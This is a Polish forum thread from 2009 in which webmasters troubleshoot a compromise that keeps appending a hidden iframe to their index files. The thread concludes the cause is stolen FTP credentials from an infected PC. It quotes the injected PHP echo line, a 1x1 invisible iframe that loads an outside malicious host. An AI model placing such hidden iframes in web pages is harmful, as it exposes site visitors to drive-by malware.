Wirus? internetcountercheck.com Opcje

[MiFlo]

Witam, nie jestem pewien czy trafiłem na odpowiedni dział, w internecie nie znalazłem nic na ten temat więc postanowiłem napisać tu.

Mam problem z serwerem (najprawdopodobniej) mianowicie chodzi o to że automatycznie zmieniają mi się pliki o nazwach index.php i na końcu pliku dodawane jest

Kod

echo "<iframe src=\"http://internetcountercheck.com/?click=89144906\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

które to blokuje formularz POST i przeglądarka informuje o tym że witryna posiada złośliwe oprogramowanie.

Napisałem do administracji mojego serwera jednak oni twierdzą że serwer jest w 100% sprawny. Pozmieniałem hasła przeskanowałem własny komputer jednak to nic nie dało mimo tego że usuwam te wpisy one po jakimś czasie spowrotem się pokazują.
System operacyjny na serwerze to FreeBSD

Byłbym wdzięczny za wszelką pomoc

Pozdrawiam

[l0ud]

Serwer nie ma tu raczej nic do rzeczy. Na ftp łączy się jakiś zewnętrzny serwer i dopisuje się do plików.
- przeskanuj wszystkie komputery, które łączyły się na FTP, w tym Twój, dokładniej.
- zmień wszystkie hasła do serwera
- dobrze by było skasować wszystkie pliki i wgrać je od nowa...

[MiFlo]

w logach połączeń do ftp nie widzę nic poza moimi logowaniami. Skrypt jest autorski i dosyć zabezpieczony. Jakieś inne propozycje?

[gciwo]

Mam to samo - nie jest to wina skryptu bo linijki dopisuje też do statycznych plików index.html.
Po usunięciu złośliwego kodu, ale nie zmieniając hasła w ftp, po kilku godzinach kod został znowu dodany - co ciekawe do kilkudziesięciu plików w tej samej minucie - za pierwszym razem ta "operacja" trwałą jakieś 2h.
Po zmianie hasła wszystko było OK. Wniosek jest tylko jeden.
Jeszcze czekam na logi do ftp.

Czy masz hosting w home?

Ten post edytował gciwo 1.02.2009, 18:22:27

[MiFlo]

nie ja mam serwery dedykowane, co do tematu to jednak wina jednego z moich komputerów (na którym jako jedynym mam system operacyjny firmy Microsoft )